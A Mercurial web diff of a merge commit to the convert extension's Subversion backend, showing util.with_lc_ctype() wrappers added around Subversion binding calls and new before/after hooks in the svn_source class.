##// END OF EJS Templates
merge with stable
Yuya Nishihara -
r45558:4a503c1b merge default
parent child Browse files
Show More
@@ -1,1589 +1,1599 b''
1 # Subversion 1.4/1.5 Python API backend
1 # Subversion 1.4/1.5 Python API backend
2 #
2 #
3 # Copyright(C) 2007 Daniel Holth et al
3 # Copyright(C) 2007 Daniel Holth et al
4 from __future__ import absolute_import
4 from __future__ import absolute_import
5
5
6 import os
6 import os
7 import re
7 import re
8 import xml.dom.minidom
8 import xml.dom.minidom
9
9
10 from mercurial.i18n import _
10 from mercurial.i18n import _
11 from mercurial.pycompat import open
11 from mercurial.pycompat import open
12 from mercurial import (
12 from mercurial import (
13 encoding,
13 encoding,
14 error,
14 error,
15 pycompat,
15 pycompat,
16 util,
16 util,
17 vfs as vfsmod,
17 vfs as vfsmod,
18 )
18 )
19 from mercurial.utils import (
19 from mercurial.utils import (
20 dateutil,
20 dateutil,
21 procutil,
21 procutil,
22 stringutil,
22 stringutil,
23 )
23 )
24
24
25 from . import common
25 from . import common
26
26
27 pickle = util.pickle
27 pickle = util.pickle
28 stringio = util.stringio
28 stringio = util.stringio
29 propertycache = util.propertycache
29 propertycache = util.propertycache
30 urlerr = util.urlerr
30 urlerr = util.urlerr
31 urlreq = util.urlreq
31 urlreq = util.urlreq
32
32
33 commandline = common.commandline
33 commandline = common.commandline
34 commit = common.commit
34 commit = common.commit
35 converter_sink = common.converter_sink
35 converter_sink = common.converter_sink
36 converter_source = common.converter_source
36 converter_source = common.converter_source
37 decodeargs = common.decodeargs
37 decodeargs = common.decodeargs
38 encodeargs = common.encodeargs
38 encodeargs = common.encodeargs
39 makedatetimestamp = common.makedatetimestamp
39 makedatetimestamp = common.makedatetimestamp
40 mapfile = common.mapfile
40 mapfile = common.mapfile
41 MissingTool = common.MissingTool
41 MissingTool = common.MissingTool
42 NoRepo = common.NoRepo
42 NoRepo = common.NoRepo
43
43
44 # Subversion stuff. Works best with very recent Python SVN bindings
44 # Subversion stuff. Works best with very recent Python SVN bindings
45 # e.g. SVN 1.5 or backports. Thanks to the bzr folks for enhancing
45 # e.g. SVN 1.5 or backports. Thanks to the bzr folks for enhancing
46 # these bindings.
46 # these bindings.
47
47
48 try:
48 try:
49 import svn
49 import svn
50 import svn.client
50 import svn.client
51 import svn.core
51 import svn.core
52 import svn.ra
52 import svn.ra
53 import svn.delta
53 import svn.delta
54 from . import transport
54 from . import transport
55 import warnings
55 import warnings
56
56
57 warnings.filterwarnings(
57 warnings.filterwarnings(
58 'ignore', module='svn.core', category=DeprecationWarning
58 'ignore', module='svn.core', category=DeprecationWarning
59 )
59 )
60 svn.core.SubversionException # trigger import to catch error
60 svn.core.SubversionException # trigger import to catch error
61
61
62 except ImportError:
62 except ImportError:
63 svn = None
63 svn = None
64
64
65
65
66 class SvnPathNotFound(Exception):
66 class SvnPathNotFound(Exception):
67 pass
67 pass
68
68
69
69
70 def revsplit(rev):
70 def revsplit(rev):
71 """Parse a revision string and return (uuid, path, revnum).
71 """Parse a revision string and return (uuid, path, revnum).
72 >>> revsplit(b'svn:a2147622-4a9f-4db4-a8d3-13562ff547b2'
72 >>> revsplit(b'svn:a2147622-4a9f-4db4-a8d3-13562ff547b2'
73 ... b'/proj%20B/mytrunk/mytrunk@1')
73 ... b'/proj%20B/mytrunk/mytrunk@1')
74 ('a2147622-4a9f-4db4-a8d3-13562ff547b2', '/proj%20B/mytrunk/mytrunk', 1)
74 ('a2147622-4a9f-4db4-a8d3-13562ff547b2', '/proj%20B/mytrunk/mytrunk', 1)
75 >>> revsplit(b'svn:8af66a51-67f5-4354-b62c-98d67cc7be1d@1')
75 >>> revsplit(b'svn:8af66a51-67f5-4354-b62c-98d67cc7be1d@1')
76 ('', '', 1)
76 ('', '', 1)
77 >>> revsplit(b'@7')
77 >>> revsplit(b'@7')
78 ('', '', 7)
78 ('', '', 7)
79 >>> revsplit(b'7')
79 >>> revsplit(b'7')
80 ('', '', 0)
80 ('', '', 0)
81 >>> revsplit(b'bad')
81 >>> revsplit(b'bad')
82 ('', '', 0)
82 ('', '', 0)
83 """
83 """
84 parts = rev.rsplit(b'@', 1)
84 parts = rev.rsplit(b'@', 1)
85 revnum = 0
85 revnum = 0
86 if len(parts) > 1:
86 if len(parts) > 1:
87 revnum = int(parts[1])
87 revnum = int(parts[1])
88 parts = parts[0].split(b'/', 1)
88 parts = parts[0].split(b'/', 1)
89 uuid = b''
89 uuid = b''
90 mod = b''
90 mod = b''
91 if len(parts) > 1 and parts[0].startswith(b'svn:'):
91 if len(parts) > 1 and parts[0].startswith(b'svn:'):
92 uuid = parts[0][4:]
92 uuid = parts[0][4:]
93 mod = b'/' + parts[1]
93 mod = b'/' + parts[1]
94 return uuid, mod, revnum
94 return uuid, mod, revnum
95
95
96
96
97 def quote(s):
97 def quote(s):
98 # As of svn 1.7, many svn calls expect "canonical" paths. In
98 # As of svn 1.7, many svn calls expect "canonical" paths. In
99 # theory, we should call svn.core.*canonicalize() on all paths
99 # theory, we should call svn.core.*canonicalize() on all paths
100 # before passing them to the API. Instead, we assume the base url
100 # before passing them to the API. Instead, we assume the base url
101 # is canonical and copy the behaviour of svn URL encoding function
101 # is canonical and copy the behaviour of svn URL encoding function
102 # so we can extend it safely with new components. The "safe"
102 # so we can extend it safely with new components. The "safe"
103 # characters were taken from the "svn_uri__char_validity" table in
103 # characters were taken from the "svn_uri__char_validity" table in
104 # libsvn_subr/path.c.
104 # libsvn_subr/path.c.
105 return urlreq.quote(s, b"!$&'()*+,-./:=@_~")
105 return urlreq.quote(s, b"!$&'()*+,-./:=@_~")
106
106
107
107
108 def geturl(path):
108 def geturl(path):
109 try:
109 try:
110 return svn.client.url_from_path(svn.core.svn_path_canonicalize(path))
110 return svn.client.url_from_path(svn.core.svn_path_canonicalize(path))
111 except svn.core.SubversionException:
111 except svn.core.SubversionException:
112 # svn.client.url_from_path() fails with local repositories
112 # svn.client.url_from_path() fails with local repositories
113 pass
113 pass
114 if os.path.isdir(path):
114 if os.path.isdir(path):
115 path = os.path.normpath(os.path.abspath(path))
115 path = os.path.normpath(os.path.abspath(path))
116 if pycompat.iswindows:
116 if pycompat.iswindows:
117 path = b'/' + util.normpath(path)
117 path = b'/' + util.normpath(path)
118 # Module URL is later compared with the repository URL returned
118 # Module URL is later compared with the repository URL returned
119 # by svn API, which is UTF-8.
119 # by svn API, which is UTF-8.
120 path = encoding.tolocal(path)
120 path = encoding.tolocal(path)
121 path = b'file://%s' % quote(path)
121 path = b'file://%s' % quote(path)
122 return svn.core.svn_path_canonicalize(path)
122 return svn.core.svn_path_canonicalize(path)
123
123
124
124
125 def optrev(number):
125 def optrev(number):
126 optrev = svn.core.svn_opt_revision_t()
126 optrev = svn.core.svn_opt_revision_t()
127 optrev.kind = svn.core.svn_opt_revision_number
127 optrev.kind = svn.core.svn_opt_revision_number
128 optrev.value.number = number
128 optrev.value.number = number
129 return optrev
129 return optrev
130
130
131
131
132 class changedpath(object):
132 class changedpath(object):
133 def __init__(self, p):
133 def __init__(self, p):
134 self.copyfrom_path = p.copyfrom_path
134 self.copyfrom_path = p.copyfrom_path
135 self.copyfrom_rev = p.copyfrom_rev
135 self.copyfrom_rev = p.copyfrom_rev
136 self.action = p.action
136 self.action = p.action
137
137
138
138
139 def get_log_child(
139 def get_log_child(
140 fp,
140 fp,
141 url,
141 url,
142 paths,
142 paths,
143 start,
143 start,
144 end,
144 end,
145 limit=0,
145 limit=0,
146 discover_changed_paths=True,
146 discover_changed_paths=True,
147 strict_node_history=False,
147 strict_node_history=False,
148 ):
148 ):
149 protocol = -1
149 protocol = -1
150
150
151 def receiver(orig_paths, revnum, author, date, message, pool):
151 def receiver(orig_paths, revnum, author, date, message, pool):
152 paths = {}
152 paths = {}
153 if orig_paths is not None:
153 if orig_paths is not None:
154 for k, v in pycompat.iteritems(orig_paths):
154 for k, v in pycompat.iteritems(orig_paths):
155 paths[k] = changedpath(v)
155 paths[k] = changedpath(v)
156 pickle.dump((paths, revnum, author, date, message), fp, protocol)
156 pickle.dump((paths, revnum, author, date, message), fp, protocol)
157
157
158 try:
158 try:
159 # Use an ra of our own so that our parent can consume
159 # Use an ra of our own so that our parent can consume
160 # our results without confusing the server.
160 # our results without confusing the server.
161 t = transport.SvnRaTransport(url=url)
161 t = transport.SvnRaTransport(url=url)
162 svn.ra.get_log(
162 svn.ra.get_log(
163 t.ra,
163 t.ra,
164 paths,
164 paths,
165 start,
165 start,
166 end,
166 end,
167 limit,
167 limit,
168 discover_changed_paths,
168 discover_changed_paths,
169 strict_node_history,
169 strict_node_history,
170 receiver,
170 receiver,
171 )
171 )
172 except IOError:
172 except IOError:
173 # Caller may interrupt the iteration
173 # Caller may interrupt the iteration
174 pickle.dump(None, fp, protocol)
174 pickle.dump(None, fp, protocol)
175 except Exception as inst:
175 except Exception as inst:
176 pickle.dump(stringutil.forcebytestr(inst), fp, protocol)
176 pickle.dump(stringutil.forcebytestr(inst), fp, protocol)
177 else:
177 else:
178 pickle.dump(None, fp, protocol)
178 pickle.dump(None, fp, protocol)
179 fp.flush()
179 fp.flush()
180 # With large history, cleanup process goes crazy and suddenly
180 # With large history, cleanup process goes crazy and suddenly
181 # consumes *huge* amount of memory. The output file being closed,
181 # consumes *huge* amount of memory. The output file being closed,
182 # there is no need for clean termination.
182 # there is no need for clean termination.
183 os._exit(0)
183 os._exit(0)
184
184
185
185
186 def debugsvnlog(ui, **opts):
186 def debugsvnlog(ui, **opts):
187 """Fetch SVN log in a subprocess and channel them back to parent to
187 """Fetch SVN log in a subprocess and channel them back to parent to
188 avoid memory collection issues.
188 avoid memory collection issues.
189 """
189 """
190 if svn is None:
190 with util.with_lc_ctype():
191 raise error.Abort(
191 if svn is None:
192 _(b'debugsvnlog could not load Subversion python bindings')
192 raise error.Abort(
193 )
193 _(b'debugsvnlog could not load Subversion python bindings')
194 )
194
195
195 args = decodeargs(ui.fin.read())
196 args = decodeargs(ui.fin.read())
196 get_log_child(ui.fout, *args)
197 get_log_child(ui.fout, *args)
197
198
198
199
199 class logstream(object):
200 class logstream(object):
200 """Interruptible revision log iterator."""
201 """Interruptible revision log iterator."""
201
202
202 def __init__(self, stdout):
203 def __init__(self, stdout):
203 self._stdout = stdout
204 self._stdout = stdout
204
205
205 def __iter__(self):
206 def __iter__(self):
206 while True:
207 while True:
207 try:
208 try:
208 entry = pickle.load(self._stdout)
209 entry = pickle.load(self._stdout)
209 except EOFError:
210 except EOFError:
210 raise error.Abort(
211 raise error.Abort(
211 _(
212 _(
212 b'Mercurial failed to run itself, check'
213 b'Mercurial failed to run itself, check'
213 b' hg executable is in PATH'
214 b' hg executable is in PATH'
214 )
215 )
215 )
216 )
216 try:
217 try:
217 orig_paths, revnum, author, date, message = entry
218 orig_paths, revnum, author, date, message = entry
218 except (TypeError, ValueError):
219 except (TypeError, ValueError):
219 if entry is None:
220 if entry is None:
220 break
221 break
221 raise error.Abort(_(b"log stream exception '%s'") % entry)
222 raise error.Abort(_(b"log stream exception '%s'") % entry)
222 yield entry
223 yield entry
223
224
224 def close(self):
225 def close(self):
225 if self._stdout:
226 if self._stdout:
226 self._stdout.close()
227 self._stdout.close()
227 self._stdout = None
228 self._stdout = None
228
229
229
230
230 class directlogstream(list):
231 class directlogstream(list):
231 """Direct revision log iterator.
232 """Direct revision log iterator.
232 This can be used for debugging and development but it will probably leak
233 This can be used for debugging and development but it will probably leak
233 memory and is not suitable for real conversions."""
234 memory and is not suitable for real conversions."""
234
235
235 def __init__(
236 def __init__(
236 self,
237 self,
237 url,
238 url,
238 paths,
239 paths,
239 start,
240 start,
240 end,
241 end,
241 limit=0,
242 limit=0,
242 discover_changed_paths=True,
243 discover_changed_paths=True,
243 strict_node_history=False,
244 strict_node_history=False,
244 ):
245 ):
245 def receiver(orig_paths, revnum, author, date, message, pool):
246 def receiver(orig_paths, revnum, author, date, message, pool):
246 paths = {}
247 paths = {}
247 if orig_paths is not None:
248 if orig_paths is not None:
248 for k, v in pycompat.iteritems(orig_paths):
249 for k, v in pycompat.iteritems(orig_paths):
249 paths[k] = changedpath(v)
250 paths[k] = changedpath(v)
250 self.append((paths, revnum, author, date, message))
251 self.append((paths, revnum, author, date, message))
251
252
252 # Use an ra of our own so that our parent can consume
253 # Use an ra of our own so that our parent can consume
253 # our results without confusing the server.
254 # our results without confusing the server.
254 t = transport.SvnRaTransport(url=url)
255 t = transport.SvnRaTransport(url=url)
255 svn.ra.get_log(
256 svn.ra.get_log(
256 t.ra,
257 t.ra,
257 paths,
258 paths,
258 start,
259 start,
259 end,
260 end,
260 limit,
261 limit,
261 discover_changed_paths,
262 discover_changed_paths,
262 strict_node_history,
263 strict_node_history,
263 receiver,
264 receiver,
264 )
265 )
265
266
266 def close(self):
267 def close(self):
267 pass
268 pass
268
269
269
270
270 # Check to see if the given path is a local Subversion repo. Verify this by
271 # Check to see if the given path is a local Subversion repo. Verify this by
271 # looking for several svn-specific files and directories in the given
272 # looking for several svn-specific files and directories in the given
272 # directory.
273 # directory.
273 def filecheck(ui, path, proto):
274 def filecheck(ui, path, proto):
274 for x in (b'locks', b'hooks', b'format', b'db'):
275 for x in (b'locks', b'hooks', b'format', b'db'):
275 if not os.path.exists(os.path.join(path, x)):
276 if not os.path.exists(os.path.join(path, x)):
276 return False
277 return False
277 return True
278 return True
278
279
279
280
280 # Check to see if a given path is the root of an svn repo over http. We verify
281 # Check to see if a given path is the root of an svn repo over http. We verify
281 # this by requesting a version-controlled URL we know can't exist and looking
282 # this by requesting a version-controlled URL we know can't exist and looking
282 # for the svn-specific "not found" XML.
283 # for the svn-specific "not found" XML.
283 def httpcheck(ui, path, proto):
284 def httpcheck(ui, path, proto):
284 try:
285 try:
285 opener = urlreq.buildopener()
286 opener = urlreq.buildopener()
286 rsp = opener.open(b'%s://%s/!svn/ver/0/.svn' % (proto, path), b'rb')
287 rsp = opener.open(b'%s://%s/!svn/ver/0/.svn' % (proto, path), b'rb')
287 data = rsp.read()
288 data = rsp.read()
288 except urlerr.httperror as inst:
289 except urlerr.httperror as inst:
289 if inst.code != 404:
290 if inst.code != 404:
290 # Except for 404 we cannot know for sure this is not an svn repo
291 # Except for 404 we cannot know for sure this is not an svn repo
291 ui.warn(
292 ui.warn(
292 _(
293 _(
293 b'svn: cannot probe remote repository, assume it could '
294 b'svn: cannot probe remote repository, assume it could '
294 b'be a subversion repository. Use --source-type if you '
295 b'be a subversion repository. Use --source-type if you '
295 b'know better.\n'
296 b'know better.\n'
296 )
297 )
297 )
298 )
298 return True
299 return True
299 data = inst.fp.read()
300 data = inst.fp.read()
300 except Exception:
301 except Exception:
301 # Could be urlerr.urlerror if the URL is invalid or anything else.
302 # Could be urlerr.urlerror if the URL is invalid or anything else.
302 return False
303 return False
303 return b'<m:human-readable errcode="160013">' in data
304 return b'<m:human-readable errcode="160013">' in data
304
305
305
306
306 protomap = {
307 protomap = {
307 b'http': httpcheck,
308 b'http': httpcheck,
308 b'https': httpcheck,
309 b'https': httpcheck,
309 b'file': filecheck,
310 b'file': filecheck,
310 }
311 }
311
312
312
313
313 def issvnurl(ui, url):
314 def issvnurl(ui, url):
314 try:
315 try:
315 proto, path = url.split(b'://', 1)
316 proto, path = url.split(b'://', 1)
316 if proto == b'file':
317 if proto == b'file':
317 if (
318 if (
318 pycompat.iswindows
319 pycompat.iswindows
319 and path[:1] == b'/'
320 and path[:1] == b'/'
320 and path[1:2].isalpha()
321 and path[1:2].isalpha()
321 and path[2:6].lower() == b'%3a/'
322 and path[2:6].lower() == b'%3a/'
322 ):
323 ):
323 path = path[:2] + b':/' + path[6:]
324 path = path[:2] + b':/' + path[6:]
324 # pycompat.fsdecode() / pycompat.fsencode() are used so that bytes
325 # pycompat.fsdecode() / pycompat.fsencode() are used so that bytes
325 # in the URL roundtrip correctly on Unix. urlreq.url2pathname() on
326 # in the URL roundtrip correctly on Unix. urlreq.url2pathname() on
326 # py3 will decode percent-encoded bytes using the utf-8 encoding
327 # py3 will decode percent-encoded bytes using the utf-8 encoding
327 # and the "replace" error handler. This means that it will not
328 # and the "replace" error handler. This means that it will not
328 # preserve non-UTF-8 bytes (https://bugs.python.org/issue40983).
329 # preserve non-UTF-8 bytes (https://bugs.python.org/issue40983).
329 # url.open() uses the reverse function (urlreq.pathname2url()) and
330 # url.open() uses the reverse function (urlreq.pathname2url()) and
330 # has a similar problem
331 # has a similar problem
331 # (https://bz.mercurial-scm.org/show_bug.cgi?id=6357). It makes
332 # (https://bz.mercurial-scm.org/show_bug.cgi?id=6357). It makes
332 # sense to solve both problems together and handle all file URLs
333 # sense to solve both problems together and handle all file URLs
333 # consistently. For now, we warn.
334 # consistently. For now, we warn.
334 unicodepath = urlreq.url2pathname(pycompat.fsdecode(path))
335 unicodepath = urlreq.url2pathname(pycompat.fsdecode(path))
335 if pycompat.ispy3 and u'\N{REPLACEMENT CHARACTER}' in unicodepath:
336 if pycompat.ispy3 and u'\N{REPLACEMENT CHARACTER}' in unicodepath:
336 ui.warn(
337 ui.warn(
337 _(
338 _(
338 b'on Python 3, we currently do not support non-UTF-8 '
339 b'on Python 3, we currently do not support non-UTF-8 '
339 b'percent-encoded bytes in file URLs for Subversion '
340 b'percent-encoded bytes in file URLs for Subversion '
340 b'repositories\n'
341 b'repositories\n'
341 )
342 )
342 )
343 )
343 path = pycompat.fsencode(unicodepath)
344 path = pycompat.fsencode(unicodepath)
344 except ValueError:
345 except ValueError:
345 proto = b'file'
346 proto = b'file'
346 path = os.path.abspath(url)
347 path = os.path.abspath(url)
347 if proto == b'file':
348 if proto == b'file':
348 path = util.pconvert(path)
349 path = util.pconvert(path)
349 check = protomap.get(proto, lambda *args: False)
350 check = protomap.get(proto, lambda *args: False)
350 while b'/' in path:
351 while b'/' in path:
351 if check(ui, path, proto):
352 if check(ui, path, proto):
352 return True
353 return True
353 path = path.rsplit(b'/', 1)[0]
354 path = path.rsplit(b'/', 1)[0]
354 return False
355 return False
355
356
356
357
357 # SVN conversion code stolen from bzr-svn and tailor
358 # SVN conversion code stolen from bzr-svn and tailor
358 #
359 #
359 # Subversion looks like a versioned filesystem, branches structures
360 # Subversion looks like a versioned filesystem, branches structures
360 # are defined by conventions and not enforced by the tool. First,
361 # are defined by conventions and not enforced by the tool. First,
361 # we define the potential branches (modules) as "trunk" and "branches"
362 # we define the potential branches (modules) as "trunk" and "branches"
362 # children directories. Revisions are then identified by their
363 # children directories. Revisions are then identified by their
363 # module and revision number (and a repository identifier).
364 # module and revision number (and a repository identifier).
364 #
365 #
365 # The revision graph is really a tree (or a forest). By default, a
366 # The revision graph is really a tree (or a forest). By default, a
366 # revision parent is the previous revision in the same module. If the
367 # revision parent is the previous revision in the same module. If the
367 # module directory is copied/moved from another module then the
368 # module directory is copied/moved from another module then the
368 # revision is the module root and its parent the source revision in
369 # revision is the module root and its parent the source revision in
369 # the parent module. A revision has at most one parent.
370 # the parent module. A revision has at most one parent.
370 #
371 #
371 class svn_source(converter_source):
372 class svn_source(converter_source):
372 def __init__(self, ui, repotype, url, revs=None):
373 def __init__(self, ui, repotype, url, revs=None):
373 super(svn_source, self).__init__(ui, repotype, url, revs=revs)
374 super(svn_source, self).__init__(ui, repotype, url, revs=revs)
374
375
375 if not (
376 if not (
376 url.startswith(b'svn://')
377 url.startswith(b'svn://')
377 or url.startswith(b'svn+ssh://')
378 or url.startswith(b'svn+ssh://')
378 or (
379 or (
379 os.path.exists(url)
380 os.path.exists(url)
380 and os.path.exists(os.path.join(url, b'.svn'))
381 and os.path.exists(os.path.join(url, b'.svn'))
381 )
382 )
382 or issvnurl(ui, url)
383 or issvnurl(ui, url)
383 ):
384 ):
384 raise NoRepo(
385 raise NoRepo(
385 _(b"%s does not look like a Subversion repository") % url
386 _(b"%s does not look like a Subversion repository") % url
386 )
387 )
387 if svn is None:
388 if svn is None:
388 raise MissingTool(_(b'could not load Subversion python bindings'))
389 raise MissingTool(_(b'could not load Subversion python bindings'))
389
390
390 try:
391 try:
391 version = svn.core.SVN_VER_MAJOR, svn.core.SVN_VER_MINOR
392 version = svn.core.SVN_VER_MAJOR, svn.core.SVN_VER_MINOR
392 if version < (1, 4):
393 if version < (1, 4):
393 raise MissingTool(
394 raise MissingTool(
394 _(
395 _(
395 b'Subversion python bindings %d.%d found, '
396 b'Subversion python bindings %d.%d found, '
396 b'1.4 or later required'
397 b'1.4 or later required'
397 )
398 )
398 % version
399 % version
399 )
400 )
400 except AttributeError:
401 except AttributeError:
401 raise MissingTool(
402 raise MissingTool(
402 _(
403 _(
403 b'Subversion python bindings are too old, 1.4 '
404 b'Subversion python bindings are too old, 1.4 '
404 b'or later required'
405 b'or later required'
405 )
406 )
406 )
407 )
407
408
408 self.lastrevs = {}
409 self.lastrevs = {}
409
410
410 latest = None
411 latest = None
411 try:
412 try:
412 # Support file://path@rev syntax. Useful e.g. to convert
413 # Support file://path@rev syntax. Useful e.g. to convert
413 # deleted branches.
414 # deleted branches.
414 at = url.rfind(b'@')
415 at = url.rfind(b'@')
415 if at >= 0:
416 if at >= 0:
416 latest = int(url[at + 1 :])
417 latest = int(url[at + 1 :])
417 url = url[:at]
418 url = url[:at]
418 except ValueError:
419 except ValueError:
419 pass
420 pass
420 self.url = geturl(url)
421 self.url = geturl(url)
421 self.encoding = b'UTF-8' # Subversion is always nominal UTF-8
422 self.encoding = b'UTF-8' # Subversion is always nominal UTF-8
422 try:
423 try:
423 self.transport = transport.SvnRaTransport(url=self.url)
424 with util.with_lc_ctype():
424 self.ra = self.transport.ra
425 self.transport = transport.SvnRaTransport(url=self.url)
425 self.ctx = self.transport.client
426 self.ra = self.transport.ra
426 self.baseurl = svn.ra.get_repos_root(self.ra)
427 self.ctx = self.transport.client
427 # Module is either empty or a repository path starting with
428 self.baseurl = svn.ra.get_repos_root(self.ra)
428 # a slash and not ending with a slash.
429 # Module is either empty or a repository path starting with
429 self.module = urlreq.unquote(self.url[len(self.baseurl) :])
430 # a slash and not ending with a slash.
430 self.prevmodule = None
431 self.module = urlreq.unquote(self.url[len(self.baseurl) :])
431 self.rootmodule = self.module
432 self.prevmodule = None
432 self.commits = {}
433 self.rootmodule = self.module
433 self.paths = {}
434 self.commits = {}
434 self.uuid = svn.ra.get_uuid(self.ra)
435 self.paths = {}
436 self.uuid = svn.ra.get_uuid(self.ra)
435 except svn.core.SubversionException:
437 except svn.core.SubversionException:
436 ui.traceback()
438 ui.traceback()
437 svnversion = b'%d.%d.%d' % (
439 svnversion = b'%d.%d.%d' % (
438 svn.core.SVN_VER_MAJOR,
440 svn.core.SVN_VER_MAJOR,
439 svn.core.SVN_VER_MINOR,
441 svn.core.SVN_VER_MINOR,
440 svn.core.SVN_VER_MICRO,
442 svn.core.SVN_VER_MICRO,
441 )
443 )
442 raise NoRepo(
444 raise NoRepo(
443 _(
445 _(
444 b"%s does not look like a Subversion repository "
446 b"%s does not look like a Subversion repository "
445 b"to libsvn version %s"
447 b"to libsvn version %s"
446 )
448 )
447 % (self.url, svnversion)
449 % (self.url, svnversion)
448 )
450 )
449
451
450 if revs:
452 if revs:
451 if len(revs) > 1:
453 if len(revs) > 1:
452 raise error.Abort(
454 raise error.Abort(
453 _(
455 _(
454 b'subversion source does not support '
456 b'subversion source does not support '
455 b'specifying multiple revisions'
457 b'specifying multiple revisions'
456 )
458 )
457 )
459 )
458 try:
460 try:
459 latest = int(revs[0])
461 latest = int(revs[0])
460 except ValueError:
462 except ValueError:
461 raise error.Abort(
463 raise error.Abort(
462 _(b'svn: revision %s is not an integer') % revs[0]
464 _(b'svn: revision %s is not an integer') % revs[0]
463 )
465 )
464
466
465 trunkcfg = self.ui.config(b'convert', b'svn.trunk')
467 trunkcfg = self.ui.config(b'convert', b'svn.trunk')
466 if trunkcfg is None:
468 if trunkcfg is None:
467 trunkcfg = b'trunk'
469 trunkcfg = b'trunk'
468 self.trunkname = trunkcfg.strip(b'/')
470 self.trunkname = trunkcfg.strip(b'/')
469 self.startrev = self.ui.config(b'convert', b'svn.startrev')
471 self.startrev = self.ui.config(b'convert', b'svn.startrev')
470 try:
472 try:
471 self.startrev = int(self.startrev)
473 self.startrev = int(self.startrev)
472 if self.startrev < 0:
474 if self.startrev < 0:
473 self.startrev = 0
475 self.startrev = 0
474 except ValueError:
476 except ValueError:
475 raise error.Abort(
477 raise error.Abort(
476 _(b'svn: start revision %s is not an integer') % self.startrev
478 _(b'svn: start revision %s is not an integer') % self.startrev
477 )
479 )
478
480
479 try:
481 try:
480 self.head = self.latest(self.module, latest)
482 with util.with_lc_ctype():
483 self.head = self.latest(self.module, latest)
481 except SvnPathNotFound:
484 except SvnPathNotFound:
482 self.head = None
485 self.head = None
483 if not self.head:
486 if not self.head:
484 raise error.Abort(
487 raise error.Abort(
485 _(b'no revision found in module %s') % self.module
488 _(b'no revision found in module %s') % self.module
486 )
489 )
487 self.last_changed = self.revnum(self.head)
490 self.last_changed = self.revnum(self.head)
488
491
489 self._changescache = (None, None)
492 self._changescache = (None, None)
490
493
491 if os.path.exists(os.path.join(url, b'.svn/entries')):
494 if os.path.exists(os.path.join(url, b'.svn/entries')):
492 self.wc = url
495 self.wc = url
493 else:
496 else:
494 self.wc = None
497 self.wc = None
495 self.convertfp = None
498 self.convertfp = None
496
499
500 def before(self):
501 self.with_lc_ctype = util.with_lc_ctype()
502 self.with_lc_ctype.__enter__()
503
504 def after(self):
505 self.with_lc_ctype.__exit__(None, None, None)
506
497 def setrevmap(self, revmap):
507 def setrevmap(self, revmap):
498 lastrevs = {}
508 lastrevs = {}
499 for revid in revmap:
509 for revid in revmap:
500 uuid, module, revnum = revsplit(revid)
510 uuid, module, revnum = revsplit(revid)
501 lastrevnum = lastrevs.setdefault(module, revnum)
511 lastrevnum = lastrevs.setdefault(module, revnum)
502 if revnum > lastrevnum:
512 if revnum > lastrevnum:
503 lastrevs[module] = revnum
513 lastrevs[module] = revnum
504 self.lastrevs = lastrevs
514 self.lastrevs = lastrevs
505
515
506 def exists(self, path, optrev):
516 def exists(self, path, optrev):
507 try:
517 try:
508 svn.client.ls(
518 svn.client.ls(
509 self.url.rstrip(b'/') + b'/' + quote(path),
519 self.url.rstrip(b'/') + b'/' + quote(path),
510 optrev,
520 optrev,
511 False,
521 False,
512 self.ctx,
522 self.ctx,
513 )
523 )
514 return True
524 return True
515 except svn.core.SubversionException:
525 except svn.core.SubversionException:
516 return False
526 return False
517
527
518 def getheads(self):
528 def getheads(self):
519 def isdir(path, revnum):
529 def isdir(path, revnum):
520 kind = self._checkpath(path, revnum)
530 kind = self._checkpath(path, revnum)
521 return kind == svn.core.svn_node_dir
531 return kind == svn.core.svn_node_dir
522
532
523 def getcfgpath(name, rev):
533 def getcfgpath(name, rev):
524 cfgpath = self.ui.config(b'convert', b'svn.' + name)
534 cfgpath = self.ui.config(b'convert', b'svn.' + name)
525 if cfgpath is not None and cfgpath.strip() == b'':
535 if cfgpath is not None and cfgpath.strip() == b'':
526 return None
536 return None
527 path = (cfgpath or name).strip(b'/')
537 path = (cfgpath or name).strip(b'/')
528 if not self.exists(path, rev):
538 if not self.exists(path, rev):
529 if self.module.endswith(path) and name == b'trunk':
539 if self.module.endswith(path) and name == b'trunk':
530 # we are converting from inside this directory
540 # we are converting from inside this directory
531 return None
541 return None
532 if cfgpath:
542 if cfgpath:
533 raise error.Abort(
543 raise error.Abort(
534 _(b'expected %s to be at %r, but not found')
544 _(b'expected %s to be at %r, but not found')
535 % (name, path)
545 % (name, path)
536 )
546 )
537 return None
547 return None
538 self.ui.note(
548 self.ui.note(
539 _(b'found %s at %r\n') % (name, pycompat.bytestr(path))
549 _(b'found %s at %r\n') % (name, pycompat.bytestr(path))
540 )
550 )
541 return path
551 return path
542
552
543 rev = optrev(self.last_changed)
553 rev = optrev(self.last_changed)
544 oldmodule = b''
554 oldmodule = b''
545 trunk = getcfgpath(b'trunk', rev)
555 trunk = getcfgpath(b'trunk', rev)
546 self.tags = getcfgpath(b'tags', rev)
556 self.tags = getcfgpath(b'tags', rev)
547 branches = getcfgpath(b'branches', rev)
557 branches = getcfgpath(b'branches', rev)
548
558
549 # If the project has a trunk or branches, we will extract heads
559 # If the project has a trunk or branches, we will extract heads
550 # from them. We keep the project root otherwise.
560 # from them. We keep the project root otherwise.
551 if trunk:
561 if trunk:
552 oldmodule = self.module or b''
562 oldmodule = self.module or b''
553 self.module += b'/' + trunk
563 self.module += b'/' + trunk
554 self.head = self.latest(self.module, self.last_changed)
564 self.head = self.latest(self.module, self.last_changed)
555 if not self.head:
565 if not self.head:
556 raise error.Abort(
566 raise error.Abort(
557 _(b'no revision found in module %s') % self.module
567 _(b'no revision found in module %s') % self.module
558 )
568 )
559
569
560 # First head in the list is the module's head
570 # First head in the list is the module's head
561 self.heads = [self.head]
571 self.heads = [self.head]
562 if self.tags is not None:
572 if self.tags is not None:
563 self.tags = b'%s/%s' % (oldmodule, (self.tags or b'tags'))
573 self.tags = b'%s/%s' % (oldmodule, (self.tags or b'tags'))
564
574
565 # Check if branches bring a few more heads to the list
575 # Check if branches bring a few more heads to the list
566 if branches:
576 if branches:
567 rpath = self.url.strip(b'/')
577 rpath = self.url.strip(b'/')
568 branchnames = svn.client.ls(
578 branchnames = svn.client.ls(
569 rpath + b'/' + quote(branches), rev, False, self.ctx
579 rpath + b'/' + quote(branches), rev, False, self.ctx
570 )
580 )
571 for branch in sorted(branchnames):
581 for branch in sorted(branchnames):
572 module = b'%s/%s/%s' % (oldmodule, branches, branch)
582 module = b'%s/%s/%s' % (oldmodule, branches, branch)
573 if not isdir(module, self.last_changed):
583 if not isdir(module, self.last_changed):
574 continue
584 continue
575 brevid = self.latest(module, self.last_changed)
585 brevid = self.latest(module, self.last_changed)
576 if not brevid:
